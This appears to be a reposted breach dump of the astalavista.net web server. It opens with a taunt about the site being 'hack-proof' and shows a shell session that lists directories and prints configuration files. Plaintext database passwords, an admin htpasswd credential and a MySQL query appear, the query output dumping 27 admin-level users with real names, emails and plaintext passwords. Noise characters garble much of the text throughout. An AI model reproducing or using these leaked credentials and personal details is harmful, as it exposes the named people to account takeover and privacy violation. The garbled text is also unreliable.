[~] Lets take a look there, after all… they are hack-proof, aren’t they?!0 O- a5 N, v7 y0 V) o3 ^: z- E
7 a+ W( R/ x1 n: T) F
[-] Tricky task: Find home dir of astalavista.net
  b% G4 x5 p% u' N& \2 V& P4 y/ V' W' r, k0 q6 G+ k
sh-3.2$ ls -la ~astanet
' e. F7 q+ z3 @total 48
  l+ B) x2 L7 ]4 K' y' O/ @drwx–x–x  6 astanet astanet 4096 Dec 23 15:55 .
- [' H' z7 d: N& Hdrwxr-xr-x 14 root    root    4096 Mar 11 17:56 ..; X" V% H% m& x( Y) U; c( I  I2 [! {6 l
drwxr-xr-x  2 root    root    4096 Dec 23 16:00 auth% {+ E7 z6 u  O& ^* ?( P
-rw——-  1 astanet astanet 3892 Apr 16 12:14 .bash_history: i/ Z7 ]' {" F  w- N
-rw-r–r–  1 astanet astanet   33 Dec 17 21:50 .bash_logout; I6 C( L6 n8 e& X- g" ^7 _
-rw-r–r–  1 astanet astanet  176 Dec 17 21:50 .bash_profile6 O  Y- |  h7 F: b
-rw-r–r–  1 astanet astanet  124 Dec 17 21:50 .bashrc
( I4 A1 f7 h3 e, s* ddrwx–x–x  3 astanet astanet 4096 Dec 23 12:18 domains6 z- X+ M5 Y4 F( i0 h5 A4 p4 H, U
drwxrwx—  3 astanet mail    4096 Dec 23 12:18 imap
3 {8 V" {4 X/ q8 f8 f& [6 |; [drwx——  2 astanet astanet 4096 Dec 23 12:18 mail% d3 m. |& L, Z# g* U
lrwxrwxrwx  1 astanet astanet   37 Dec 23 12:18 public_html -> ./domains/astalavista.net/public_html
8 A; ]8 X+ @. J3 e9 c# n/ |; y) G# R-rw-r—–  1 astanet mail      34 Dec 22 12:41 .shadow
& Z0 k. w  N6 g. A3 O; {7 o9 D, e& j3 e* c3 T; c' H
sh-3.2$ cd /home/astanet/domains/astalavista.net/private_html/- A2 Q' {4 u5 J
sh-3.2$ ls -la1 V# o* M% l- ~
total 200; w0 f2 G2 u0 ]; B6 W7 [
drwxr-x— 29 astanet apache   4096 Jan  6 13:58 .7 J" A: U1 B; ~. Z# a1 o7 T
drwx–x–x  8 astanet astanet  4096 Dec 23 13:53 ..
# V+ g* c2 |% D& O) u# R) {( Jdrwxr-xr-x  3 astanet astanet  4096 Dec 27  2006 _007& ?; J7 i* G" J* \
drwxr-xr-x  7 astanet astanet  4096 Jan  5  2006 _0mysql/ i5 G, v/ r/ w1 W( s
drwxr-xr-x  7 astanet astanet  4096 Dec 22 14:16 链接标记astanet@astalavista.com
" F* v% W* h* u  Z7 L1 Kdrwxrwxrwx  2 astanet astanet  4096 Jan  5  2006 backend
& H; T( [* P4 T/ Jdrwxr-xr-x  2 astanet astanet  4096 Oct 24  2006 banner
# ]: C! b, W0 s& {1 t- ?-rw-r–r–  1 astanet astanet 25724 Apr  4  2006 banner.jpg+ T; B* m4 B5 V" r
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 config
2 B; ^, n7 I) P$ ?1 [  `' Odrwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 cron
- X" [# f: E6 _drwxr-xr-x 11 astanet astanet  4096 Jan  5  2006 dvd
& E) w7 W: s- z-rw-r–r–  1 astanet astanet    36 Jan  5  2006 error.php
6 w! w# R$ h: `  T# o-rw-r–r–  1 astanet astanet  1406 Jan  5  2006 favicon.ico) E4 K2 }" e4 h$ |' l
drwxrwxrwx  2 astanet astanet  4096 Dec 15  2006 feed
$ D! x8 Z; S* o  G2 \: `drwxr-xr-x  3 astanet astanet  4096 Dec  8  2006 flashtour
: ^, i2 B" `2 V. x-rw-r–r–  1 astanet astanet    18 Jan  5  2006 htaccess
4 B1 n' J* ^$ g  ]' f5 f$ Z7 l-rw-r–r–  1 astanet astanet   585 Mar 24 14:50 .htaccess
1 c1 ?, `  E2 r+ o-rw-r–r–  1 astanet astanet   398 Jan  5  2006 index1.php
+ x2 P! |/ W: A-rw-r–r–  1 astanet astanet  1036 Jan  5  2006 _index.html$ h' ~' f9 [+ Y8 Q9 V
-rw-r–r–  1 astanet astanet  6880 Dec 23 14:44 index.php  t" p* N3 o& a. Q5 D* X( m( A$ W) {
-rw-r–r–  1 astanet astanet   676 Mar 21  2006 index_redirect.php5 e: c; _$ z6 m& N
-rw-r–r–  1 astanet astanet   739 Feb 24  2006 index.swf! T. \1 J# P' l# c; X
drwxr-xr-x  4 astanet astanet  4096 Oct 18  2006 irc
4 F9 H$ \% ]2 Q# i+ Qdrwxr-xr-x  4 astanet astanet  4096 Aug 11  2006 lang
) @7 T! W/ h* G7 }/ Gdrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 lib& T7 M% j1 h; t% i: Z
drwxr-xr-x  6 astanet astanet  4096 Aug 11  2006 log
1 ^# F  e5 w6 ^) ]$ V1 edrwxr-xr-x  2 astanet astanet  4096 Jan 13 14:02 member
) i# _8 P1 j7 J' [" A  Vdrwxrwxrwx  5 astanet astanet  4096 Jun  4 00:03 memberdata* J8 G6 b- h; @4 W
drwxr-xr-x  2 astanet astanet  4096 Jan  5  2006 new5 T: o) N" _6 D( p. c/ L9 @  }
-rw-r–r–  1 astanet astanet  7219 Feb 24  2006 pix1.swf& }6 V0 @# J1 D5 ?4 }9 i' ?
drwxr-xr-x  2 astanet astanet  4096 Oct 27  2006 re; O+ b% Q% R- N  z/ _# j1 d
-rw-r–r–  1 astanet astanet    23 Jan  5  2006 robots.txt
/ [. @% j$ S5 g7 m* l' gdrwxr-xr-x  3 astanet astanet  4096 Aug 11  2006 rss( }* k5 v1 H2 b2 s5 |7 [; F$ ^
drwxr-xr-x 39 astanet astanet  4096 Dec 13  2007 sources
! y6 r' U& K$ P- K( M6 ?3 k/ edrwxrwxrwx  3 astanet astanet  4096 Feb  2 15:40 temp_com2 [+ X# _: j% o. x8 D+ d
drwxr-xr-x  7 astanet astanet  4096 Aug 11  2006 themes, a3 D  Q- J& v: U/ u$ I- Z' L6 ]
drwxr-xr-x  2 astanet astanet  4096 Mar 14  2008 tmp_src) n6 q! o/ C* ~6 j/ u, \
drwxr-xr-x  5 astanet astanet  4096 Aug 11  2006 tpl; L: h) R5 `( ?* A* U
drwxr-xr-x  3 astanet astanet  4096 Sep  7  2006 v2
7 ]6 }$ z: u) e* s5 O( cdrwxr-xr-x 16 astanet astanet  4096 Jul  5  2006 v2_old
' x5 o; a* \9 @1 i6 ?' A) n-rw-r–r–  1 astanet astanet    35 Dec  4  2006 webcash.php
* M7 [( r9 f: @2 r& t8 H; odrwxr-xr-x 13 astanet astanet  4096 Sep 21  2006 wiki
6 [. A" e& t. l7 Z0 I3 \
& @2 y1 F1 e: A2 ush-3.2$ head -20 index.php
( h  z7 P9 Q% k/ }<?PHP
/ C9 r; V1 \7 ]/**
/ D3 W+ g$ ^5 g9 ^3 @* Mainfile (external) for astalavistaNET v2.0  R) n& c; {8 {9 |+ N
*+ g9 R/ ?% t* X# w% C4 }
* @copyright     Astalavista IT Engineering GmbH
" A4 R$ m/ \9 x* @author        Thomas Kaelin <链接标记thomas.kaelin@astalavista.ch>
0 \! [- M& }% ]5 {$ Z# \3 w* D  \* @version       1.06 v! e' k  z8 l8 j- A
*/
! q3 e' a# H# @; ]' z$ e* ~) G. {) ^& V
        if ($_SERVER['PHP_SELF'] == ‘/webcash.php’) {2 c4 m: ~, i: q1 p2 I
                $dontStartSession = false;+ g. O2 Z4 P$ I( Y/ ^9 v& V7 d* Y
        } else {4 {. X. @/ e( M) i5 Q) ~" b
                $dontStartSession = true;; V# E$ w6 K/ F; J3 a' w
        }0 C" `+ l5 f! E# W0 H
        require_once($_SERVER['DOCUMENT_ROOT'].’/config/com.conf.php’);
" ~+ w# J7 H3 Q) a        require_once($_SERVER['DOCUMENT_ROOT'].’/config/ext.conf.php’);) Y* d6 c# p# G7 L* q  E: M8 E
        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’com.class.php’);
) H# _& k2 o% d( B- Y! R6 a        require_once($_CONFIG['path_absolute'].$_CONFIG['path_init'].’ext.class.php’);
7 j1 l1 x( y+ y6 p& {6 Z1 B, z% |1 L8 a! M/ v
sh-3.2$ cd config" ?& ^* x5 ^: T3 c; E& p
sh-3.2$ ls -la
' m, c8 F! K% I/ U) Y/ W) m9 Ctotal 32
% T. m, j2 B$ f; ?& Gdrwxr-xr-x  2 astanet astanet 4096 Aug 11  2006 .6 b  s4 l4 e1 E( Z' N, N% o9 r  H. B9 G
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..+ v* h, _. @2 z" r. h4 z! {4 s4 i1 A" ]/ M
-rw-r–r–  1 astanet astanet  987 Aug 11  2006 adm.conf.php, s7 V5 ~4 n+ }9 i* C
-rw-r–r–  1 astanet astanet 4937 Dec 23 15:48 com.conf.php$ A: F/ Q% `4 i6 w
-rw-r–r–  1 astanet astanet  913 Aug 11  2006 cron.conf.php% a2 X$ ?; V/ }. Q4 z+ R! I. K5 r
-rw-r–r–  1 astanet astanet 1668 Aug 20  2008 ext.conf.php
0 i0 k0 {: k( i# m$ O-rw-r–r–  1 astanet astanet 2724 May 30  2007 int.conf.php  H- X; P4 @1 A1 @
5 w/ N1 Z9 ^4 u5 j6 G' W. U# I7 V
sh-3.2$ cat com.conf.php: A/ \: c% [/ I
[snip]
$ A1 j& S  l% l0 l' s1 u" `  D3 f//member-database
/ U# v8 e" n* a$_CONFIG['db_mem_server']       = ‘localhost’;
- r2 c8 c$ ^3 C/ t$_CONFIG['db_mem_database'] = ‘astanet_membersystem’;
/ U" r6 \6 m7 L0 g& t" S$_CONFIG['db_mem_user']         = ‘astanet_db’;" R3 l+ t, i0 p
$_CONFIG['db_mem_password'] = ‘TXwVrC7hbq’;: ^: b/ U3 ]8 s: g8 O
$_CONFIG['db_mem_debug']        = false; //true or false' V! S1 t: b2 {/ x: y: G4 Q; A, Y  c
//ads-database5 j/ w0 ^' o9 R7 t+ E: }% L7 u1 N
$_CONFIG['db_ads_server']       = ‘localhost’;3 M* L% e# W5 f, a/ W
$_CONFIG['db_ads_database'] = ‘astanet_ads’;
6 r% P7 k6 W: V: @5 v$_CONFIG['db_ads_user']         = ‘astanet_db’;: G) {- y( R7 h! K" e' z9 h6 S0 l
$_CONFIG['db_ads_password'] = ‘TXwVrC7hbq’;( ?' K4 W6 v( _  z. {7 P8 N# M, k* y; S9 M
$_CONFIG['db_ads_debug']        = false; //true or false6 B6 s9 t, W( \, f, H
//rainbow-database
  }4 d/ |, U' i3 }: @2 H3 X$_CONFIG['db_rainbow_server']   = ‘212.254.194.163′;
5 J" q% b6 g) z$_CONFIG['db_rainbow_database'] = ‘rainbow’;: ~6 H% o! b) v2 S: k7 l4 x4 E4 F! h
$_CONFIG['db_rainbow_user']     = ‘dinu’;
- ?8 k3 t0 T/ s( T% H& E$_CONFIG['db_rainbow_password'] = ‘dinudinu’;
6 c$ e8 |- T  W+ v1 q/ Y4 i$_CONFIG['db_rainbow_debug']    = false; //true or false1 g5 H+ |+ Z/ T  i3 U0 |% F& o
//mailing lists database( ^$ d: q" o0 s- R% Y# P- a
$_CONFIG['db_mailing_lists_server']     = ‘localhost’;8 F& q5 n1 w* P' e% R; X( ~/ @
$_CONFIG['db_mailing_lists_database']   = ‘astanet_mailing_lists’;8 D! S9 d* J0 v4 K
$_CONFIG['db_mailing_lists_user']               = ‘astanet_db’;0 W7 \- D  [  F5 L- R" V& t/ ]
$_CONFIG['db_mailing_lists_password']   = ‘TXwVrC7hbq’;
1 Y6 p  N8 Y( u- S$_CONFIG['db_mailing_lists_debug']              = false; //true or false4 E% d: C6 I) @0 Z2 U
//paypal/ i4 V# {$ h/ g9 B9 _8 W
$_CONFIG['sub_pp_url']          = ‘链接标记[url]https://www.paypal.com/cgi-bin/webscr[/url]’;" l. x' G6 g+ X& \" N; q
$_CONFIG['sub_pp_cmd']          = ‘_xclick’;
  y* U9 c* y# Z; u! y/ t9 C$_CONFIG['sub_pp_business'] = ‘链接标记info@astalavista.net’;
1 h: L7 i- L9 @% s; B9 V9 Y7 T$_CONFIG['sub_pp_noship']       = ‘1′;) D9 t. ^  S; o; N7 v
$_CONFIG['sub_pp_referer']      = ‘链接标记[url]https://www.paypal.com/[/url]’;5 ?& u& F3 G% s$ d* ]
[snip]
2 W' R+ y2 F3 s: z$ Z1 o6 Q
$ e5 a2 {$ b% L( Osh-3.2$ cd ... W& ?+ `4 O; ?1 \$ t+ V
sh-3.2$ cd member
% J! D4 n( |2 O( V( M0 P8 zsh-3.2$ ls -la
# {7 {$ q( `* d  v3 u- xtotal 20
5 x% [: A! R( B: ddrwxr-xr-x  2 astanet astanet 4096 Jan 13 14:02 .
0 ^( R$ t" G0 Ldrwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
, V' y8 h$ O$ r& w-rw-r–r–  1 astanet astanet   19 Jan 13 14:02 .htaccess1 s1 B/ j2 T! W5 X
-rwxr-xr-x  1 astanet astanet 6709 Jan 13 14:06 index.php; C9 y: m6 u3 |$ ]1 Y
sh-3.2$ cat .htaccess. }/ ]- O, S" Z6 e
SecFilterEngine off# p) N3 E" k7 ~0 K1 c
6 g- ~" B0 u. ~3 @
sh-3.2$ cd ..
% c4 w: _! e' W+ F$ ]* Q% ]& Hsh-3.2$ cd cron
" d$ |1 M' y" h7 Ksh-3.2$ ls -la& I" I: s8 m  Q! [. e
total 168" t/ @8 ?( y) h+ I/ Q. z- m
drwxr-xr-x  3 astanet astanet  4096 Jan 12 08:52 .
/ Q9 e( e- {& ^4 b" y  ?; G8 ]drwxr-x— 29 astanet apache   4096 Jan  6 13:58 ..
% G% R! _9 \) J-rw-r–r–  1 astanet astanet  1272 Jan 12 08:24 0_corefile.php5 d/ h) W/ B. e3 V- I
-rw-r–r–  1 astanet astanet  2356 Aug 11  2006 0_functions.php  F" U2 g% R) g, H$ [+ E( D9 p
-rw-r–r–  1 astanet astanet  3616 Dec 23 15:44 1_daily.php5 j4 e  [" _" I
-rw-r–r–  1 astanet astanet   527 Aug 11  2006 1_fivemin.php
2 v. g+ O. ]& B  r& B6 v. x-rw-r–r–  1 astanet astanet  5006 Dec 23 15:39 1_hourly.php
' _  l& k/ ^: J; O& k6 h-rw-r–r–  1 astanet astanet   432 Aug 11  2006 1_weekly.php5 q) h$ J; x3 i; D5 C/ \( q* T
-rw-r–r–  1 astanet astanet  2277 Aug 11  2006 2_advertising.php
9 s5 m% w# v6 X8 K* s) q+ t-rw-r–r–  1 astanet astanet  4882 Dec 23 15:40 2_archives.php
' m! ?3 X# l. W( |5 P4 A1 H7 b& }( f-rw-r–r–  1 astanet astanet  3784 Aug 16  2006 2_awstats.sh
& n& ~$ o: Y3 x; Q* W1 M3 M-rw-r–r–  1 astanet astanet 14894 Jan 12 08:51 2_expire.bak.php; d3 Z% [% \7 d% o
-rw-r–r–  1 astanet astanet 14979 Jan 12 09:10 2_expire.php/ \1 O2 U4 ?$ I% x# q" e
-rw-r–r–  1 astanet astanet  7657 Aug 15  2006 2_exploitree_updater.php
- n, ?: p7 K8 _-rw-r–r–  1 astanet astanet   686 Dec 23 16:31 2_filesize.sh
- V  b: M3 S$ T! B  P* U-rw-r–r–  1 astanet astanet  9853 Aug 11  2006 2_keywords_old.php# D+ B5 u; j! Y& P" G; u  {2 i- D# z
-rw-r–r–  1 astanet astanet 15664 Sep 22  2006 2_keywords.php
" {  c" w! f2 [" w-rw-r–r–  1 astanet astanet  1233 Aug 11  2006 2_proxy_checker.php
, [, k6 c: \6 f$ S-rw-r–r–  1 astanet astanet  7558 Aug 11  2006 2_proxy_collector.php8 u( `- W$ ^7 y. W. M, n  k7 B* O
-rw-r–r–  1 astanet astanet   796 Aug 11  2006 99_create_emails.php9 y3 H0 B: [! _
drwxr-xr-x  2 astanet astanet  4096 Aug 11  2006 99_lang_email
. O, a& W6 q5 i) D; C1 I7 `-rw-r–r–  1 astanet astanet  9622 Jan  6 16:04 login_reminder.php
+ N" H3 i9 \  o  V. }-rw-r–r–  1 astanet astanet  9620 Jan  6 16:05 login_reminder_test.php
+ F- v# W* W2 z' R' i  \
6 |  q4 D& {. ^sh-3.2$ cd ..
( k+ Z; f0 ?2 {4 U5 u; Y' B& vsh-3.2$ cd _0075 Z* n  ~' W! k: g, \, U: s5 |6 f
sh-3.2$ ls -la
4 X5 d. H6 O$ e7 j6 A' itotal 24
$ ?( N' m* b1 x1 z+ edrwxr-xr-x  3 astanet astanet 4096 Dec 27  2006 .# s/ m5 O7 f5 E* o
drwxr-x— 29 astanet apache  4096 Jan  6 13:58 ..
8 N. C3 k$ t$ O* W7 ?. n# v-rw-r–r–  1 astanet astanet   96 Dec 23 15:17 .htaccess% V4 m' p% Q* Y. {' {
-rw-r–r–  1 astanet astanet 3263 Jan 15  2007 index.php$ w; I2 P3 w# |8 R+ D6 a: _" r. t
-rw-r–r–  1 astanet astanet   20 Dec 27  2006 info.php
. M7 ?& x& f8 W  s6 Qdrwxr-xr-x  5 astanet astanet 4096 Aug 11  2006 sitemap, h' r! R. T# c% O1 {3 ~

  Y8 \! L" E- o$ Z* b5 i- nsh-3.2$ cat  .htaccess
# k& L% ~& q+ ^1 q2 Y* \authType Basic, }, v% P- T2 D8 s. ^
authName Admin6 S+ C+ d- B# J, [& e5 I6 M/ S
authUserFile /home/astanet/auth/.htadm_pwd5 _; |7 E8 [  _* e* Y- T2 ~
require valid-user. r5 Q0 G# {! M
# F" \7 t5 x' i& D2 L
sh-3.2$ cat /home/astanet/auth/.htadm_pwd
) j* F4 N$ \. z$ `# j+ I/ T* h9 c- Vadmin2net:CR0bl65MwhfT6 ^( K- n+ z! K) H
# q1 X7 y6 B  i( y3 x4 Y5 ^
sh-3.2$ mysql -u astanet_db -p
, Y/ |% e% d6 w: c4 w# X; HEnter password:  N' T& n, L* l
Welcome to the MySQL monitor.  Commands end with ; or \g.
! G8 O1 p" L9 B% c+ H9 z% m6 E4 X- ZYour MySQL connection id is 2751536 W+ C# _! K+ Q9 ]8 i+ I: o
Server version: 5.0.45-community-log MySQL Community Edition (GPL)6 w# E2 ~2 a0 m5 C, D, f4 b

: a& [4 a# A. Y7 p  R, w; sType ‘help;’ or ‘\h’ for help. Type ‘\c’ to clear the buffer.
. V  O6 k; o$ T( V  T7 C2 b: T" O5 e2 Q7 B% d
mysql> show databases;. i  H( Y7 Q) d- t) ]- d& H
+———————–+: m" o" D  p0 H9 u1 j4 G8 W
| Database              |
- s; h$ d/ a2 ]/ l9 u- q+———————–+1 J$ D& Z7 k; Y* h$ h! c# W% H3 |
| information_schema    |! Q5 y9 S$ r2 q" m3 j' o
| astanet_ads           |, A% r, b- e: I/ i
| astanet_mailing_lists |, \! V. ]- Y7 K# q" {! c
| astanet_mediawiki     |
9 O. t# F% j  S! ~5 s( p  c' n| astanet_membersystem  |3 _; k# f' |3 o/ T4 B
| test                  |
# u& V& {% T) ]2 H6 A+———————–+
& m) H5 t6 ?2 R9 q' @/ }$ p0 ]6 rows in set (0.00 sec)
& K, G2 X8 S* z# g6 k& m: j4 o; E) K+ _/ o; r5 x2 ^. g
mysql> use astanet_membersystem
& e3 ?+ v& ^- g: B0 z  a& G6 v; }Database changed
9 Y% }5 H( v. [1 Gmysql> show tables;6 _2 y7 Y3 c2 g6 p* P
+———————————–+; I) ~1 @# f  d. n8 Y6 B' _) N; h: d2 F
| Tables_in_astanet_membersystem    |
- |( J9 X$ ?/ {. q+———————————–+9 H/ {+ F! p( Q+ L. V4 L$ Z
| blacklist_categories              |: @1 V$ ]8 ?7 @+ w" a8 J. g2 T, J
| blacklist_content                 |9 V0 V+ ?* k3 v' Q& m; X# H* s
| blacklist_levels                  |! {$ a' w  z6 T5 L0 c
| blacklist_mcset                   |; P: {" E* C) D8 e$ L5 H1 d: d6 i
| dir_categories                    |+ C' }- g. m5 Y' ~# k
| dir_comments                      |" k5 r% i. R& ?3 V, C
| dir_links                         |8 l, c2 T$ b) C" ?6 S8 q
| dir_temp                          |
5 ]" C: U* a7 v, E) u0 z; c| dir_votes                         |
: K% d( d. j. U( J| documents                         |
5 |' h8 Z  C: v* m+ p| documents_categories              |6 i2 {6 W6 p% ^; o2 X$ U8 p
| email_content                     |
. ^8 K5 s: k2 s1 Q% G| email_settings                    |
: _# V  X+ s: z# y* M| exploits                          |/ d8 g* k4 ?/ `9 y/ S9 ]
| exploits_categories               |
: [$ w* J3 |" x$ u" W| exploittree_categories            |3 U0 F# p* n! Y0 ~" D9 l
| exploittree_exploits              |
! s$ w6 R! g# g# b| home_values                       |
+ A- ?- y- c+ O. L| iso_countries                     |2 R0 J2 h$ b' G: k! c' |* o
| links_categories                  |
# z+ G+ s4 P0 R  U| links_records                     |6 ~* G* a8 w% T" E3 t) T
| links_unauth                      |
; X% b5 {7 i- ^# }* G! L( [5 x| links_votes                       |
( z8 s$ m% f4 l( W: Y4 ]| log                               |4 R3 X0 s( J5 J# P$ w+ g5 S
| news_categories                   |% e- o+ k$ J2 Z6 N
| news_comments                     |
3 H  r: d$ a2 G3 c( x| news_emoticons                    |- H$ X; J! [* G' N$ o! [; l
| news_latest                       |+ _1 o/ Q/ c4 w: E
| news_messages                     |
/ b7 c4 L% O9 B- O: y4 A# y| news_statistics                   |; ^4 Y3 o  R) l
| news_votes                        |& ~7 l) [0 Y% }0 G& X- E
| prices_content                    |2 K, H1 x; y5 h" Z
| prices_offers                     |
5 H" A% s! e, ~9 E4 k| rss_settings                      |
; H" S! v( t$ S5 l7 d4 d- ^| sessions                          |
2 H0 _5 y. r0 @( e  y' v7 U4 R. Z| stats_signups                     |
- W5 ]6 I3 u" d% m- T| u2u2                              |! X% j# y4 {$ ?  R( Q
| u2u_contact                       |
7 \. m* y1 d2 L| u2u_settings                      |
; x6 U+ N  Y" M( _+ a! J- O| user_keywords_selected_categories |& e1 B! d; \6 n5 v7 T
| users                             |: I, K$ X# r3 e( F8 c
| users_ipn_test                    |$ V. Q# I  W' K9 j, k; \* g
| users_keyword_values              |
- i8 c' i% z: u2 V( R# ~| users_profile                     |
- ]7 n1 n; ~. {! M| users_temp                        |
& D$ B) ]; a1 `| users_upgrade                     |3 @0 F5 C/ L0 e0 V# n( {( `' _4 {: |
+———————————–+
: _( o4 R+ b# A1 x/ e1 H- u46 rows in set (0.00 sec)# S* e7 Y) f* e# K/ {$ L

' Q) j4 {. t/ ~* z/ i+ ymysql> describe users;$ @  T+ C; y8 t! ~% I# E7 C
+————————–+————————————–+——+—–+———————+—————-+  ^+ M( b/ |  p* F, _6 \9 i
| Field                    | Type                                 | Null | Key | Default             | Extra          |" S$ e: l7 B) f/ a
+————————–+————————————–+——+—–+———————+—————-+
% l/ }& H( g( H) V| primary_key              | smallint(5) unsigned                 | NO   | PRI | NULL                | auto_increment |# o6 O; R! X( r! [
| user                     | varchar(50)                          | NO   |     |                     |                |6 k" g; C7 C+ D' g
| nickname                 | varchar(30)                          | NO   | MUL | anonymous           |                |
; n+ Z" ]" X5 F/ @5 v! L| password                 | varchar(30)                          | NO   |     |                     |                |( E5 `/ w" R  v4 b+ o' X( z
| userlevel                | tinyint(3)                           | YES  | MUL | NULL                |                |& N6 z& W9 O: S( m3 H1 ]
| exp                      | int(8) unsigned                      | NO   |     | 0                   |                |
: {) j3 z9 Y) a- X- M% E9 c0 d% C6 ?| email                    | varchar(50)                          | NO   |     |                     |                |
6 G: d9 c; V5 v$ m! O| ip                       | varchar(15)                          | NO   |     | 0                   |                |
6 ~( S  R: u* w; B8 B$ ~5 s| proxy                    | set(’0′,’1′)                         | NO   |     | 0                   |                |
& v! U3 i8 V) A2 r0 |7 u! r5 a9 J| logtime                  | timestamp                            | NO   |     | CURRENT_TIMESTAMP   |                |
9 @+ Z* n0 w4 Y# x) {| login_reminder_last_sent | timestamp                            | NO   |     | 0000-00-00 00:00:00 |                |: H8 p5 U4 h6 l9 V2 H
| anz_in                   | tinyint(1)                           | NO   |     | -1                  |                |
* o- O% ?/ O4 A, R7 q| status                   | tinyint(1) unsigned                  | NO   |     | 0                   |                |: |1 A/ f6 u5 @9 f4 |# z/ D
| checked                  | set(’0′,’1′,’2′)                     | NO   |     | 0                   |                |9 d; x# G/ Q9 e; I% m
| freemember               | set(’0′,’1′)                         | NO   |     | 0                   |                |
, V" f% _. Z* q% x* }| ordertype                | set(’transfer’,'wp’,'pp’,'mc’,'CnB’) | YES  |     | NULL                |                |0 I/ [4 F3 ~5 a1 F7 m  o
| lang                     | tinytext                             | NO   |     |                     |                |
. R) p; }9 g% z& ~4 T0 z| adid                     | smallint(6)                          | NO   |     | 0                   |                |7 V! v  }, f) l
| pp_txn_id                | varchar(255)                         | YES  |     | NULL                |                |0 L  p. F$ r) f+ c& r
| cnb_transaction_id       | varchar(255)                         | YES  |     | NULL                |                |
1 b5 V2 K& K1 N( _- v) B| cnb_order_id             | varchar(255)                         | YES  |     | NULL                |                |7 E4 |; `  ~  V
| cnb_user_id              | int(11)                              | YES  |     | 0                   |                |
; ^* u' G" z$ s8 m) ^' v* T+————————–+————————————–+——+—–+———————+—————-+5 Z! f8 M% z! J& C
22 rows in set (0.01 sec)
' x7 _: m2 G9 @
* u0 x$ f: r6 T; j2 T8 [+ emysql> select count(*) as skids from users;: l8 X$ |7 |; b2 w4 _/ O
+——-+
9 I9 V4 V& \% v0 ]4 z( \" j2 X9 P| skids |
4 v( G3 ^4 P3 p6 }( V3 O+——-+
' W/ L& P1 \& Z  P3 {| 25199 |
( b7 Q4 U. Z1 c+——-+
& Q" a/ [: a& o7 B& u: ~2 W, }! X1 row in set (0.00 sec)5 n) g; n) a) X1 ^8 j

* L, J" A, b# Y' |7 |mysql> select user,nickname,password,email from users where userlevel = 1;
  w+ M& Q7 f& x+————————–+———————-+——————+———————————–+5 V2 @1 y- ?% q
| user                     | nickname             | password         | email                             |7 M7 f+ T2 q" ]* I7 O( m- R
+————————–+———————-+——————+———————————–+! u: Y; m0 {/ g: k
| pascal                   | prozac               | astaman3         | 链接标记info@astalavista.net              |- G+ D. g9 \+ f, G
| Ivan Schmid              | rOOtless1            | astalavista4asta | 链接标记ivan.schmid@comvation.com         |* }' r) ^: N2 y9 f/ J  r
| qreymer                  | Palermo              | qblsw85iam       | 链接标记eche@home.se                      |
, x2 T! u+ Z8 X  S) d* j# R8 Q| Christian Wehrli         | g0atherd             | hitt?74          | 链接标记g0atherd@gmx.net                  |
* A5 |' o* u0 d  Z) A. k7 m, S7 h4 J| Andrew Blake             | Minky                | liq73uid         | 链接标记a.blake@har.mrc.ac.uk             |
( A, H1 a% F8 L/ l$ u| Martin Wyss              | dinu                 | kj63;cXy         | 链接标记martin.wyss@astalavista.net       |1 w$ S) _3 t: n0 ~4 C$ L. y( T* T
| Leandro Nery             | Timan_no_Sanco       | nery2002         | 链接标记leandronery@hotmail.com           |
; G# Q! q  ?3 B3 [1 I" t3 h| shaving ryans privates   | ShavingRyansPrivates | memberboard313   | 链接标记shavingryansprivates1@hotmail.com |
7 J0 m( [* [: a' W$ y2 ~! n8 L# c| Gerben van der Lubbe     | Spoofed Existence    | Lb59eXg5         | 链接标记spoofedexistence@hotmail.com      |# E; p/ p; b* v& S2 E
| David M Lee              | Daremo               | icG12m03         | 链接标记daremo@hackerheaven.com           |
9 H" E0 `, `6 [/ K: I  e- Y! ~% z6 D| David Corn               | akriel               | ve3uB$cUku       | 链接标记akriel@fallenroot.net             |, e( Y& v1 U4 n3 r" S
| Thomas Kalin             | Gwanun               | QwErTy123        | 链接标记thomas.kaelin@astalavista.net     |- K' S6 }2 T$ R% f1 X
| Marcus unknown           | Cra58cker            | hhCr4ck06        | 链接标记unknownmarcus@hotmail.com         |+ n6 M4 b; H1 F% T* K6 y
| David Ellis              | dellis203            | philip           | 链接标记dellis@nightwatchnss.com          |
3 e* o4 A1 y) F( M' j/ z6 i| Lars Christian Solberg   | xeor                 | tF3s4|Nea        | 链接标记xeor@hush.com                     |) c! p* d8 o/ `0 S4 D3 i
| Paulo Santos             | Be1er0ph0r1          | amor01           | 链接标记pmsantos@gmx.ch                   |) |. y& p4 ]$ X
| Thomas D?ppen            | daha                 | asta4tom         | 链接标记thomas.daeppen@astalavista.ch     |
% X. Q, }% Z2 D| Touraj Abbasi Moghaddasi | -Crow1               | NetR0ck          | 链接标记toraj.a.m@gmail.com               |
: W( _' i3 x( Z& R& @| Fabius Bernet            | traviser             | wellenreiter100  | 链接标记fabius.bernet@astalavista.ch      |
+ u% D& G4 a$ |+ U0 u$ O+ l. }| Zachary McElroy          | duder1               | dirty245dix      | 链接标记mcelroyzj@yahoo.com               |6 L5 M9 [# f* p
| Leron Cohen              | cohen2               | leron4free       | 链接标记leron@quiredmedia.com             |" v' j' a# x* H2 X) y9 r
| Beatriz Pontes           | anonymous1656        | pitas            | 链接标记joao.pedro.pontes@gmail.com       |
0 A+ K5 |" Q! p/ _3 {# h7 m| Glafkos Charalambous     | anonymous2086        | si99490178$#     | 链接标记nowayout@webhostline.com          |
& W! ?" q+ `& X7 B8 \| developer COMVATION      | anonymous2402        | Ri?Q$Q$MVU       | 链接标记ivan.schmid@astalavista.ch        |
) ^% T  S" w& R; H% O- _4 z| Peter Fisher             | cyph3r1              | testZer025435    | 链接标记cyph3r@astalavista.com            |5 I) s, E! C0 K+ Y$ `
| sykadul                  | sykadul              | ak29eral         | 链接标记sykadul@gmail.com                 |
' ~" H7 j! [( S6 a+ q| Ronny Janzi              | commander1           | mpbdaagf6m       | 链接标记ronny.janzi@astalavista.ch        |
: D/ l6 a  n4 G. C' u4 v" Y+————————–+———————-+——————+———————————–+4 a* z8 [' G* V8 t; B
27 rows in set (0.00 sec)
5 t" `' t# m7 V/ h- M8 {/ k/ [, W" A5 d& x9 g; G) h" m$ |% e. Q
mysql> exit;
